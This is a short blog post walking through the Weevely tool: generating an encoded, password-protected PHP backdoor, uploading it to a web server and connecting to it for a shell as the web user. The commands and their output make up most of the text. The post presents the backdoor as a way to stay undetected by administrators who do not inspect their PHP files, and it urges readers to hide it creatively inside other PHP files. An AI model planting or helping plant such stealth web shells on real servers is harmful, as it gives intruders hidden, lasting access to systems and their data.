Silent Backdoor with Weevely

Ever think to gain access to your backdoor undetected? Well, maybe not all web administrators examine their php files? Weevely is the answer. Just follow these actions (I was doing this on Backtrack 5):

[email protected]:~# >cd /pentest/backdoors/web/weevely
[email protected]:/pentest/backdoors/web/weevely#./main.py -g -p bD_p4ss -o bd.php
Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
+ Backdoor file 'bd.php' created with password 'bD_p4ss'.
[email protected]:/pentest/backdoors/web/weevely#

Where:
-p = your password to access the backdoor
-g = generate a new encrypted php file (it doesn’t actually encrypt the file, they encode it)
-o = specify your output file
Now you have a new “encrypted” php file called bd.php. So how does it work?
You can put this script on the webserver document root.
Now take a look what will it be when i put the script and accessed it.

[email protected]:/pentest/backdoors/web/weevely# ./main.py -t -u http://10.10.10.10/bd.php -p bD_p4ss
Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
+ Using method 'system()'.
+ Retrieving terminal basic environment variables .
[[email protected] /var/www] id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[[email protected] /var/www] pwd
/var/www
[[email protected] /var/www]

Voila! we’ve got a non-interactive shell!
Weevely can also be easily deployed inside any php file, but you should pay attention on where this script will be injected, be creative 🙂

Default image
modpr0be

Posisi saya saat ini sebagai direktur dan pemilik PT Spentera, sebuah perusahaan yang fokus dalam bidang penetration test, incident response, intrusion analysis and forensic investigation.

Saya juga berkontribusi untuk repositori eksploit Metasploit Framework sebagai pengembang kode eksploit. Saat ini memegang sertifikasi dari Offensive Security Certified Professional (OSCP), Offensive Security Certified Expert (OSCE), ISO/IEC ISMS 27001: 2013 Lead Auditor/Auditor, GIAC Certified Intrusion Analyst (GCIA), dan Offensive Security Exploitation Expert (OSEE).

Jika ingin menghubungi saya dapat melalui email bisnis di tom at spentera dot id atau pribadi di me at modpr0 dot be

Articles: 64

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.